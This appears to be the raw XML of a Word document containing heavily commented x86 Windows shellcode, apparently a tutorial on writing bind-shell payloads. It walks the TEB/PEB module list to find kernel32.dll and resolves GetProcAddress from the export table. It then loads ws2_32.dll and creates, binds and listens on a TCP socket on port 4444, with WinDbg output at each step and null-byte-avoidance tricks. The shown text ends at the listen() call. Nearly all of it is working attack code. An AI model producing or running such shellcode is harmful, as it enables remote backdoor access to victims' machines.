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E82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# Create a new stack frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081BBF3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ebp                ; push current base pointer to the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B842FB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ebp, esp            ; Set Base Stack Pointer for new Stack-Frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0926BAC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sub esp, 0x60           ; Decrement the stack by 96 to create space for saving pointers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD7A62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450D865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# Push string "GetProcAddress",0x00 onto the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E8605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clear eax register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C57EF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ax, 0x7373          ; AX is the lower 16-bits of the 32bit EAX Register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA59A6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eax                ;   ss : 73730000 // EAX = 0x00007373 // \x73=ASCII "s"      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02207FB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0x65726464         ; erdd : 65726464 // "GetProcAddress"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D0485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0x41636f72         ; Acor : 41636f72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5874795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0x50746547         ; PteG : 50746547</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0760DF5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[ebp-0x4], esp      ; save PTR to string at bottom of stack (ebp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A65F94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25191AB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# Find Base Address of the kernel32.dll Dynamically Linked Library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F22DD5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- In Windows, the FS Segment Register will always point to the Thread Environment Block (TEB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0791F39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- This shellcode is dynamic &amp; does not rely on any hardcoded addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053A254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- The addresses in the comments are used as an example and will be different for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B3A95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- The easiest way to get the WinDbg commands to work is to connect to the Windows Symbol Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61755FE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- On new versions of Windows, kernel32.dll is the 3rd dll in the Initialization Order Module List.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEDECB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- On older versions of Windows, kernel32.dll was the 2nd dll. Now the 2nd dll is kernelbase.dll.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389E748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  - Interestingly kernelbase.dll also has functions like LoadLibraryA &amp; GetProcAddress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EA4A3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  - kernelbase.dll can be used instead of kernel32.dll sometimes, but we will stick with kernel32.dll.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042E2FF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clear eax register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF4017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[fs:eax+0x30]  ; #1| Get PEB Address from within the TEB; leveraging the FS Register.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE8CBB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!teb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DBAF4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TEB at 002e9000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E1010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dt nt!_TEB 002e9000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F049A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+0x030 ProccessEnviromentBlock: 0x002e8000 _PEB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B46275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EAX = 0x002e8000 (Address_of_PEB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5F293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[eax+0xc]      ; #2| Get the LDR Address from within the PEB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BDE8B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dt nt!_PEB 002e8000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E94BEE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+0x00c Ldr : 0x77becb80 _PEB_LDR_DATA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6D178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EAX = 0x77becb80 (Address_of_LDR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032BC3D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[eax+0x1c]     ; #3| Get the first entry in the Initialization Order Module List (ntdll.dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41052BB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dt nt!_PEB_LDR_DATA 0x77becb80 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6A8A5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 xml:space="preserve">                         ;  +0x01c InInitializationOrderModuleList : _LIST_ENTRY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584AC07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db 0x77becb80+1c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C6755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77becb9c  90 1d 5f 00  // First Entry is 0x005f1d90 (reverse for Little Endian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46914C5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db 0x5f1d90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2ACAD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        #00#01#02#03#04#05#06#07#08#09#0a#0b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B3C7F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005f1d90  38 26 5f 00 9c cb be 77-00 00 ad 77</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070BE56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- we see that 0x5f1d90+0x8 is the base address of ntdll.dll - 0x77ad0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6BF4C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 - ModLoad: 77ad0000 ntdll.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9B8DF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- We also see that the next entry in the list is at 0x005f2638</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A2957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EAX = 0x005f1d90 (First Entry of InInitialzationOrderModuleList - ntdll.dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284E15A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#4| Get the second entry in the Initialization Order Module List (kernelbase.dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0C24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ebx, eax            ; - Should be 'mov eax, [eax]', but the opcode contains a null byte 8B00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704A73E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[ebx]          ;   - Avoid null byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734E9CF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dt nt!_LIST_ENTRY 0x5f1d90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E8CDC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+0x000 Flink            : 0x005f2638 _LIST_ENTRY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632A421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db 0x005f2638</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6736A2E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005f2638  78 22 5f 00 90 1d 5f 00-00 00 56 75 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36137DD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- We see that 0x005f2638+0x8 is the base address of kernelbase.dll - 0x75560000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D03EE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- ModLoad: 75560000 C:\Windows\System32\KERNELBASE.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6409356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- We also see that the next entry in the list is at 0x005f2278</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505266F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EAX = 0x005f2638 (Second Entry of InInitialzationOrderModuleList - kernelbase.dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0444F49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#5| Get the third entry in the Initialization Order Module List (kernel32.dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6467023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ebx, eax            ; - Should be 'mov eax, [eax]', but the opcode contains a null byte 8B00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECBEF6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[ebx]          ;   - Avoid null byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AB7DC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dt nt!_LIST_ENTRY 0x005f2638</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E05532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+0x000 Flink            : 0x005f2278 _LIST_ENTRY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D549FF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db 0x005f2278</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0288BC0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005f2278  9c cb be 77 38 26 5f 00-00 00 22 76 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A29D2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- We see that 0x005f2278+0x8 is the base address of kernel32.dll - 0x76220000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4373D2F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- ModLoad: 76220000 C:\Windows\System32\KERNEL32.DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D71FB0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EAX = 0x005f2278 (Third Entry of InInitialzationOrderModuleList - kernel32.dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B7B0C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 xml:space="preserve"> mov eax, [eax+0x8]      ; move the kernel32.dll base address into the EAX register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04AFF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EAX = 0x76220000 (Base address of kernel32.dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DF2DA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[ebp-0x8], eax      ; Save the base address of kernel32.dll in the 2nd from bottom position on our stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE7763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36AE592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# Find Base Address of GetProcAddress Symbol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599EB96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- Now that we have the base address of kernel32.dll, we will use it to find the address for the Symbol(function) GetProcAddress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393AAF6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- GetProcAddress() will then be used to find the addresses of all other Symbols(functions) that we need.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6700B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- The Export Table technique is used to find the address of GetProcAddress (as detailed in Skapes Windows Shellcoding Paper).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59935C9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ebx, [eax+0x3c]     ; save Relative Virtual Address (RVA/Offset) of New_Exe_Header to ebx.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0553430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WinDbg&gt; db 0x76220000+3c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664026C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7622003c  f8 00 00 00  // EBX = 0x000000f8 = Offset to New EXE Header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461CB76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ebx, eax            ; (kernel32.dll baseAddr) + (RVA New_Exe_Header) = Address of New_Exe_Header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5923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     0x76220000       +        0xf8          =       0x762200f8 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB7E62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EBX =  0x762200f8 (Address of new  Header)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4004742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ebx, [ebx+0x78]     ; (RVA of New Exe Header) + 0x78 = RVA of Export-Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E7DE4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db 0x762200f8+0x78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B47C7F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76220170  b0 77 07 00   // EBX = 0x000777b0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE93E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ebx, eax            ; (kernel32.dll baseAddr) + (RVA Export-Table) = Address of Export-Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0D3B4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     0x76220000       +    0x000777b0        =       0x762977b0  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A88A6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EBX now holds the address of the Export Table for kernel32.dll (0x762977b0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D3842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edi, [ebx+0x20]     ; PTR to RVA of Name-Pointer Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A820FC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WinDbg&gt; db 0x762977b0+0x20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA535C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762977d0  e0 90 07 00   // EDI = 0x000790e0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0D6C1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edi, eax            ; (kernel32.dll baseAddr) + (RVA Name-Pointer Table) = Address of Name-Pointer Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F767F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       0x76220000       +    0x000790e0        =       0x762990e0  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5B895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[ebp-0xC], edi      ; save Address of Name-Pointer Table in the 3rd from bottom position in our stack-frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B124C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ecx, [ebx+0x24]     ; PTR to RVA of Ordinal Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDBB88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ecx, eax            ; (kernel32.dll baseAddr) + (RVA Ordinal Table) = Address of Ordinal Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4330F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[ebp-0x10], ecx     ; save PTR to Ordinal Table Address at 4th from bottom of stack (ebp-16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BB563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17E7630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edx, [ebx+0x1c]     ; PTR to RVA of Address Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE144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 xml:space="preserve"> add edx, eax            ; (kernel32.dll baseAddr) + (RVA Address Table) = Address of Address Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ECA56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[ebp-0x14], edx     ; save PTR to Address Table Address at 5th from bottom of stack (ebp-20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F91864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1CD93E4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edx, [ebx+0x14]     ; Value of Number of Functions/Symbols within the Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5537775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4BE967D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Counter = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5441A84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75E096D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loop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440765A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edi, [ebp-0xC]      ; Address of the Name-Pointer Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD4D19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esi, [ebp-0x4]      ; PTR to string "GetProcAddress",0x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0179D16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            ; clear ecx register -- used for counters/loops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3963D2D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cld                     ; clear direction flag, DF=0 -- Process strings from left to right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459D055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edi, [edi+eax*4]    ; Entries in Name Pointer Table are 4 bytes long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E36BA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edi = RVA of Nth entry = (Address of Name-Pointer Table) + (Counter * 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A56EE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edi, [ebp-0x8]      ; edi = address of string = (kernel32.dll base addr) + (RVA of Nth entry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039BBB0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cx, 0xf             ; ecx = length of string to compare = sizeof("GetProcAddress") = 15 (14 Letters + 1 String Terminator Char)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0863D19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repe cmpsb              ; compare first 15 bytes of string. esi cmp edi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786C6EF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if equal ZF=1, if not ZF=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E9BCC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jz found                ; if strings match end loop, else increment eax and loop again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFC811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inc eax                 ; counter ++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F195B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cmp eax, edx            ; check if eax = Value of Number of Functions/Symbols within the Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F08799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jb loop                 ; If eax != edx, restart the loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032CC0D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66EDBF4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found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CF1CB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The Counter (eax) now holds the poisition of GetProcAddress within the table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298CC1B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ecx, [ebp-0x10]     ; ecx = Address of Ordinal Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F0564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edx, [ebp-0x14]     ; edx = Address of Address Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2AE8F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ax, [ecx + eax*2]   ; ax = ordinal number = (Address of Ordinal Table) + (counter * 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B38194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[edx + eax*4]  ; eax = RVA of function = var20 + (ordinal * 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122EB90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eax, [ebp-0x8]      ; eax = address of GetProcAddress = (RVA of GetProcAddress) + (kernel32.dll base addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257BE04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Address of GetProcAddress is now in EAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C59101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[ebp-0x18], eax     ; save Address of GetProcAddress onto Stack 0x18=24; 6th from bottom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCB109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4C47EFE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GetProcAddress(&amp;kernel32.dll, PTR "LoadLibraryA"0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECA7D1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GetProcAddress(hModule, lpProcName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392D492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>;   hModule:    address of the DLL module that contains the function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195C0B6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lpProcName: A Pointer to the beginning of an ASCII string of the functions name; null terminated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E24A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            ; EDX = 0x00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34417B1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null terminator for LoadLibraryA string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1B88B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0x41797261         ; Ayra : 41797261 // "LoadLibraryA",0x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E58447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0x7262694c         ; rbiL : 7262694c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B46A83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0x64616f4c         ; daoL : 64616f4c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AF7DD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$hModule    -- push the address of the start of the string onto the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177AE49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[ebp-0x8]    ; $lpProcName -- push base address of kernel32.dll to the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609F4B2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Move the address of GetProcAddress into the EAX register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A12945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Call the GetProcAddress Function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D0EB6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             ; The address of the queried function is returned into the EAX register.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE296B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[ebp-0x1c], eax     ; save Address of LoadLibraryA onto Stack 0x1c=28; 7th from bottom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BBF5D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12D233E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251D409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LoadLibraryA(PTR "ws2_32.dll"0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E43B26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push "ws2_32",0x00 (Null terminated) to the stack and save pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361EFEB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clear eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1DA2D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ax, 0x3233          ; ASCII: 3 = 0x33, ASCII: 2 = 0x32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FD0A7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eax                ; push 0x00,0x00,"23" to stack (for ws2_32.dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53865FF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0x5f327377         ; push "_2sw" to the stack (in reverse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651BD16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the pointer to the string to the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773C69D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63B5B47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ebx, [ebp-0x1c]     ; LoadLibraryA Address to ebx register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD87AF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ebx                ; call the LoadLibraryA Function to load ws2_32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F231B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[ebp-0x20], eax     ; save Address of ws2_32.dll onto Stack at 0x20=32; 8th from bottom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B21F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5602AF5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*ws2_32.dll, "WSAStartup"0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400D4F5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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A9489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dx, 0x7075          ; pu : 7075</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E52CB7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push "up",0x0000 to stack from end of string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595411F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0x74726174         ; trat : 74726174</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0942B92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0x53415357         ; SASW : 53415357</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC5E76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 to string to stack for 'WSAStartup',0x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464A68C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[ebp-0x20]   ; push base address of ws2_32.dll to stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA178E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 to EAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A7DFA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GetProcAddress(PTR *ws2_32.dll, "WSAStartup"0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233BEA2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;   EAX = WSAStartup Address </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C93986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 xml:space="preserve"> mov [ebp-0x24], eax     ; save Address of WSAStartup onto Stack 0x24=36; 9th from bottom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5549F83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11C41F3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2BED39A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WSAStartup - WSAStartUp(MAKEWORD(2, 2),        wsadata_pointer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CA4F0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            int WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A46ADB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ebx, ebx            ; EBX = 0x00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6482133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bx, 0x0190</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D286D3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sub esp, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F1B17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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D31F2C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103BA04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[ebp-0x24]     ; WSAStartup Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F769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call WSAStartUp() to enable tcp networking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F45EC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47E605A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5E73214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*ws2_32.dll, "WSASocketA"0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D032D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3BA66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dx, 0x4174          ; At : 4174 // "WSASocketA",0x0000 string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6C2CD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push "tA",0x0000 to stack from end of string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1300258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0x656b636f         ; ekco : 656b636f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AC1FC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0x53415357         ; SASW : 53415357</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714B110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 to string to stack for 'WSASocketA',0x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D9BC5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[ebp-0x20]   ; push base address of ws2_32.dll to stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271B64A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 to EAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F0DE4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GetProcAddress(PTR *ws2_32.dll, "WSASocketA"0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138BA5C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;   EAX = WSASocketA Address </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F62A8C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[ebp-0x28], eax     ; save Address of WSASocketA onto Stack 0x28=40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F238C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0578293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WSASocketA( AF_INET = 2, SOCK_STREAM = 1, TCP = 6, NULL, NULL, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD117E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ebx, ebx            ; clear ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098F410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                ; dwFlags  = null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BF6FD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                ; g(group) = null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6633001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                ; lpProtocolInfo = null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D987DC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            ; clear ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1D1C7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cl, 6               ; IPPROTO_TCP = 6 // use TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD9184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push protocol to the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C84638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inc ebx                 ; SOCK_STREAM = 1 // for TCP Socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB443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                ; push type (of socket) to stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A54D8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inc ebx                 ; AF_INET = 2 // Use IPv4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319BC91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                ; Push Address Family (af) ipv4 to stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E9F7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[ebp-0x28]     ; load address of WSASocketA() into eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B995B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Call the WSASocketA() Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB076D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EAX = Handle to NewSocket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CD457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[ebp-0x2c], eax     ; save Address New Socket Handle onto Stack 0x2c=44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EEDB3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415BD56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struct sockaddr_in { AF_INET = 2; p4444 = 0x5c11; INADDR_ANY = 0x00000000; };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B16786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ebx, ebx            ; clear ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2816EDA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ebx                ; IP address =  INADDR_ANY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A7E37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word 0x5c11        ; 0x115c = port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCEA7E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bl, 2               ; AF_INET = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0CD21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word bx            ; push ipv4 af to stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E48F8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[ebp-0x30], esp     ; save Address of sockaddr_in struct onto Stack 0x30=48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7562F95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710493D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*ws2_32.dll, "bind"0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A9588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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B62BC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Null terminate string "bind" on stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B9567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0x646e6962         ; dnib : 646e6962 - push "bind"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1237EF4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pointer-to-string to stack for 'bind',0x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E31F8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[ebp-0x20]   ; push base address of ws2_32.dll to stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E5D3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 to EAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8B87A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GetProcAddress(PTR *ws2_32.dll, "bind"0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE129F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;   EAX = bind base-address </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5513464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[ebp-0x34], eax     ; save Address of bind onto Stack 0x34=52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7B634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1B9BE2E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bind(ptr socketHandle, ptr sockaddr_in, sizeof(sockaddr_in) = 16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C581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byte 16            ; push size of sockaddr_in struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAB34B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[ebp-0x30]   ; Push pointer to sockaddr_in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4612B86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[ebp-0x2c]   ; push socket handle returned from WSASocketA()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5738684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[ebp-0x34]     ; load address of bind()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0491F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Call the bind() function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C601FA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5EAAED4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*ws2_32.dll, "listen"0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5CE18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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C44EF1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cx, 0x6e65          ; ne : 6e65 // "listen",0x0000 string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B95AA5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push "en",0x00,0x00 to stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B482A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0x7473696c         ; tsil : 7473696c - push "list" to stack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1306142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pointer-to-string to stack for 'listen',0x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B408FF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[ebp-0x20]   ; push base address of ws2_32.dll to stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E092A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 to EAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106633D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GetProcAddress(PTR *ws2_32.dll, "listen")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDF4A3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;   EAX = listen() base-address </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002E358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[ebp-0x38], eax     ; save Address of listen() onto Stack 0x38=56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C791C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0E31033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listen(ptr socketHandle, int backlog);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095567D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D219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backlog is used for multple connections. We only need 1, so set to zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577DAF4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 xml:space="preserve"> push dword [ebp-0x2c]   ; push socket handle returned from WSASocketA()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBAE33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[ebp-0x38]     ; load address of listen() that we saved to the stack eariler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BABAD1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Call the listen() function</w:t>
      </w:r>
    </w:p>
